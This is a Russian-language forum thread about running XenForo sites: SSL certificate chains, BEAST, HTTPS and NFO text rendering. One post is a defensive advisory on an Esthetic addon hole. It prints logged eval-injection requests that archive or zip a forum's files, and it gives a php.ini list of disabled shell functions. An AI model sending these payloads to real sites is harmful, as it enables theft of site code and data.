• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

XenForo.Начало пути.

Интересна ли вам эта тема?

  • Да

    Голосов: 11 100.0%
  • Нет

    Голосов: 0 0.0%

  • Всего проголосовало
    11

Rufus

Уважаемый пользователь
Форумчанин
Регистрация
14.12.2014
Сообщения
247
Репутация
114
Jabber
Ща на работе...А где я мог накосячить с цепочкой?В панельке при установке было поле только для сертификата и ключа.Каких-то дополнительных настроек не было.Или я мог ошибиться при получении сертификата?
Понял свою ошибку.Я просто вставил содержимое сертификата,надо было так
З.Ы.Олег,а по другим проблемам которые отображены в твоей ссылке,я могу напрягать поддержку или они не будут заниматься подобным?
И вообще этот сервис показывает когда-нибудь идеальные результаты)?
 
Последнее редактирование:

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Ну уязвимость Beast не страшно, т.к. она для старых браузеров, которыми мало кто пользуется, а во вторых хрен её проэксплуатируешь, вот условия для атаки:

1.Атакующий должен иметь возможность прослушивать сетевые соединения, инициированные браузером жертвы;
2.У атакующего должна быть возможность внедрить агент в браузер жертвы;
3.Агент должен иметь возможность отправлять произвольные (более-менее) HTTPS-запросы;
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Олег,фигня какая-то...Зашёл щас с фаерфокса на ксенлабс
Снимок.PNG

Изменил цепочку сертификатов в правильном порядке,за что получил хорошую оценку твоего сервиса

Но лис так и не хочет принимать.Видно startssl ему не по душе.
Гугл советует отключить OCSP у лисы,но ведь это не вариант.На хабре тоже тёрли эту проблему.Через несколько дней она должна исчезнуть.

Снимок.PNG
 

Rufus

Уважаемый пользователь
Форумчанин
Регистрация
14.12.2014
Сообщения
247
Репутация
114
Jabber
Олег,что думаешь по поводу этой статьи и оригинала на Хабре ?
Использование HTTPS поможет уберечь своих пользователей от подобных ботов-аналитиков?
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Использование HTTPS поможет уберечь своих пользователей от подобных ботов-аналитиков?
Нет, уберечь может только VPN, ну и что-бы там тоже не логгировалось ничего...

А SSL нужен для двух целей:

1)Скрыть от третьих лиц, в частнности и от провайдера тоже конфиденциальную инфу, т.е. логины, пароли, данные кредитки и т.д.;

2)Если перевести весь сайт на SSL, то код его будет полностью шифроваться, что исключит возможности вставки провайдером произвольного кода в ваш сайт, а это может-быть реклама например (Что уже не редкость кстати)...WinkSmile
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Решил апнуть эту тему;)
Нахожусь уже продолжительное время на форумах посвящённых тематике XenForo.И всё больше удивляет одержимость новичков в обвешивании своих форумов разного рода платёжными системами , баннерами с рекламой и хайдами.Ладно хер с ним,что форум кривой и на нём нет никакой инфы,но ведь ставят всё подряд,совершенно не заботясь о безопасности форума и его пользователей.Поэтому хочу вернуться к вопросу поднятому Олегом в этой теме,а именно про аддоны известного Виоделя (estheticlabs).
Его хайд и складчина пользуются ОГРОМНЕЙШЕЙ популярностью.Но никто не хочет задуматься об уязвимостях присутствующих в них.
Фикc аддонов esthetic от слива форума
В аддонах Esthetic обнаружилась дырка позволяющая выполнить любой код и слить форум.
Форум сливается примерно такими запросами:
Код:
    passthru() has been disabled for security reasons
    library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
   
    Содержимое запроса
   
    array(3) {
      ["url"] => string(264) "http://вас сайт/бла/бла/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27tar%20-cvvzf%20foo.tar.gz%20./library%27));"
      ["_GET"] => array(2) {
      ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
      ["query"] => string(49) "die(passthru('tar -cvvzf foo.tar.gz ./library'));"
      }
      ["_POST"] => array(0) {
      }
    }
Код:
    RecursiveDirectoryIterator::__construct(./cgi): failed to open dir: Permission denied
    library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
   
    Содержимое запроса
   
    array(3) {
      ["url"] => string(601) "http://ваш сайт/threads/тут ссылка на складчину/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=$zip=new%20ZipArchive;$zip-%3Eopen(%27backup.zip%27,ZipArchive::CREATE);$files=new%20RecursiveIteratorIterator(new%20RecursiveDirectoryIterator(%27./%27),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files%20as%20$name=%3E$file){$filePath%20=%20$file-%3EgetRealPath();$zip-%3EaddFile($filePath);}$zip-%3Eclose();"
      ["_GET"] => array(2) {
        ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
        ["query"] => string(283) "$zip=new ZipArchive;$zip->open('backups.rar',ZipArchive::CREATE);$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator('./'),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files as $name=>$file){$filePath = $file->getRealPath();$zip->addFile($filePath);}$zip->close();"
      }
      ["_POST"] => array(0) {
      }
    }
Теперь перейдем к лечению дырок на примеру плагина хайда от конторы esthetic
Открываем файл: library/Esthetic/EBBC/ControllerPublic/Thread.php
Находим:
Код:
case '54626eee0bcb90ab43c7917eb49f2344'
и удаляем вторую строку
Код:
case 'a6746afee9fa4e6e4901943d47f272bf''
либо генерируем свой md5 код и вставлем вместо этих двух.Остальное плагины латаются по аналогии

Потом идем в файл php.ini который находится на вашем сервере,либо хостинге и ищем
строчку disable_functions и заменяем на:
disable_functions="popen,exec,system,passthru,proc_open,shell_exec
Взято с programmisty.net​
И ещё информация по теме:


Тэги:Esthetic Collaborative Shopping,Esthetic Simple Payments,Esthetic Extended BB-Codes,HIDE esthetic
.extended.bb-codes,скачать бесплатно :Mem2:
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Форум сливается примерно такими запросами:
А это как понимаю пхп нужно залить на удалённый сервер и уже там выполнить код, или как ?

А вообще самая хорошая защита - Это не ставить плагины от личностей, которые зарекомендовали себа как троянщики, к тому-же это не первая уязвимость в его плагинах...

Что касается хайда - есть альтернативы, если говорить про совместные закупки - то за такую цену можно найти более-менее адекватного спеца, который напишит вам такой модуль...

Ну и можно ещё поставить Web Aplication Firewall он блокирует большинство похожих уязвимостей (Просто блокирует такие запросы), правда форум может глючить и не исключены ложные срабатывания...

Ещё можно перейти на SSL, тоже небольшая защита будет !WinkSmile
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Олег,хочу у тебя проконсультироваться...
На ксенфоро.вс у нас имеется одна француженка и она тут подняла вопрос,как создать bb-код для nfo.Привела пример такого же вопроса на офе
Я сначала думал,что это опечатка и нужно простое окошечко с info.Тот код с офа немного подредактировал и при вставке текста в тэги он появлялся в виде информационного окна.
Но впоследствии оказалось,что нужно выводить именно .
Вот пример:

d6967553cb0009fa6ce4d5024f99c276.png
но после вставки у француженки отображается так
548c40902f4d87bdeкукукdfa68664f1a2377.png
То есть символы нечитабельны.Проблемы с кодировкой?С отсутствием этих символов?
И ещё,некоторые nfo изображения редактор ломает сам по себе.Например,вот так выглядит оригинал:

Снимок.PNG

а вот так он отображается после вставки в редактор
Сним  ок.PNG

Жорик ничего посоветовать не смог.У тебя есть какие-нибудь версии?
Вот та на вс.
 
Последнее редактирование:

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
То есть символы нечитабельны.Проблемы с кодировкой?С отсутствием этих символов?
И ещё,некоторые nfo изображения редактор ломает сам по себе.Например,вот так выглядит оригинал:
Попробуйте поиграть со шрифтами, на оффе этот:

face="Lucida Console ANSI, Terminal"

А у тебя:

face="Tahoma, Verdana"

Может нужен именно Terminal он как-раз ничго карёжить не будет...Не въехал!!!
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Верх Низ